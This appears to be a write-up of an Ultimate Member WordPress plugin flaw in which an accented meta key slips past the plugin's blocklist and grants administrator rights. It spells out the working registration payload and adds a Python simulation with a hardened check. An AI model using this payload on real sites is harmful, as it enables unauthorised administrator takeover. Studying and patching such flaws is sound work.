WordPress ships with a fixed set of roles: `Super Admin`, `Administrator`, `Editor`, `Author`, `Contributor` and `Subscriber`
, so how can we gain admin privileges? First, let's look at how the Ultimate Member plugin works. The plugin has to be configured before it functions: we create a few pages in the Pages section, then link those pages under Ultimate Member > Settings, and after that we can create new roles or just use the default roles Ultimate Member offers.

When we register through the Ultimate Member form, the new account gets the `Subscriber` role. If we take a look at the `wp_usermeta` table in MySQL, we can see the `wp_capabilities` value for that user is set to a serialized array, and that is what defines our role, which in this case is `Subscriber`.

So can we set `wp_capabilities` ourselves? We can try passing `wp_capabilities` as a parameter in the POST request while registering, like so:

`wp_capabilities=administrator`

This does not work, because the plugin runs every submitted meta key through a function called `is_metakey_banned`. That function checks the key against a blocklist of values such as `cap_key`, `wp_capabilities`, `wp_user_level`, `user_activation_key`, etc. The one we are interested in is `wp_capabilities`, but if that exact key is in our request body it hits the `break` there and the value is never saved, which prevents us from changing our role.

The blocklist check is an exact string comparison, but the database lookup is not: the default WordPress table collations (`utf8mb4_unicode_ci` and `utf8mb4_general_ci`) are accent- and case-insensitive, so MySQL treats characters like `à, è, ì, ò, ù, À, È, Ì, Ò, Ù` as equal to their plain Latin letters. So if we use one of these characters in our request body, something like `wp_càpabilities=administrator`, what will happen? The key does not hit the break point on line 182 of class-user.php, so we bypass the `is_metakey_banned` function, and the value is written to a meta_key that MySQL matches against `wp_capabilities`.

The `wp_capabilities` value of an admin account is the serialized array `a:1:{s:13:"administrator";b:1;}`, which is what we want. Let's try passing that string straight into our parameter. That does not give us the result we want, because WordPress does its own serialization on the way into the database (a value that already looks serialized is serialized again), so the stored value is not the array we need. Since WordPress serializes arrays for us, we can pass our value as a PHP array and let WordPress do the rest. Our final payload looks like this: `wp_càpabilities[administrator]=1`.
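The script below is an added example (my own, not code from this write-up or from the Ultimate Member plugin) that covers both the blocklist bypass and the serialization step described above. It models three things: the exact-match blocklist check as the write-up describes it, how an accent-insensitive MySQL collation folds `wp_càpabilities` into `wp_capabilities`, and what WordPress' `maybe_serialize()` ends up storing when the value arrives as a PHP array versus as an already-serialized string. The function names, the collation folding approximation and the hardened check are assumptions for illustration; the banned-key list is the subset quoted above, and the sample request bodies are constructed.

```python
import re
import unicodedata
from urllib.parse import parse_qsl

# Subset of the keys is_metakey_banned() refuses, as quoted in the write-up.
BANNED_META_KEYS = ("cap_key", "wp_capabilities", "wp_user_level", "user_activation_key")


def is_metakey_banned_naive(key):
    """Exact string match against the blocklist: the vulnerable behaviour."""
    return key in BANNED_META_KEYS


def collation_fold(s):
    """Approximate how MySQL's accent- and case-insensitive collations
    (utf8mb4_unicode_ci / utf8mb4_general_ci) compare strings: decompose,
    drop combining marks, fold case. 'wp_càpabilities' -> 'wp_capabilities'.
    This is an approximation (assumption), not a full collation table."""
    decomposed = unicodedata.normalize("NFKD", s)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch)).casefold()


def is_metakey_banned_hardened(key):
    """Assumed fix: compare the key the way the database will, after folding."""
    folded = collation_fold(key)
    return any(folded == collation_fold(b) for b in BANNED_META_KEYS)


def parse_php_form(body):
    """Parse an x-www-form-urlencoded body the way PHP fills $_POST:
    'a[b]=1' becomes {'a': {'b': '1'}} (one bracket level is enough here)."""
    out = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", raw_key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[raw_key] = value
    return out


def php_serialize(value):
    """Minimal PHP serialize() for the types that occur here."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        inner = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{inner}}}"
    raise TypeError(type(value))


def is_php_serialized(s):
    """Rough equivalent of WordPress is_serialized()."""
    return isinstance(s, str) and re.match(r"^[abidsO]:", s) is not None and s.endswith((";", "}"))


def maybe_serialize(value):
    """WordPress maybe_serialize(): arrays are serialized, and a string that
    already looks serialized is serialized *again* (double serialization),
    which is why passing the raw a:1:{...} string does not work."""
    if isinstance(value, (dict, list)) or is_php_serialized(value):
        return php_serialize(value)
    return value


def stored_usermeta(body):
    """Simulate what lands in wp_usermeta for a registration body after the
    naive blocklist: meta_key -> meta_value as MySQL would receive it."""
    return {k: maybe_serialize(v) for k, v in parse_php_form(body).items()
            if not is_metakey_banned_naive(k)}


if __name__ == "__main__":
    # Constructed request bodies: the blocked attempt and the bypass.
    print(stored_usermeta("user_login=bob&wp_capabilities=administrator"))
    print(stored_usermeta("user_login=bob&wp_c%C3%A0pabilities%5Badministrator%5D=1"))
    print(collation_fold("wp_càpabilities") == "wp_capabilities")
```

Note that the array form stores `s:1:"1"` rather than `b:1` as the value, since PHP receives form values as strings; WordPress only looks at the keys of this array when resolving roles, so the role is still granted. To check whether a real install is affected by this kind of folding, look at the `Collation` column that `SHOW FULL COLUMNS FROM wp_usermeta;` reports for `meta_key`; `utf8mb4_unicode_ci` and `utf8mb4_general_ci` compare accent-insensitively, whereas a `_bin` collation does not.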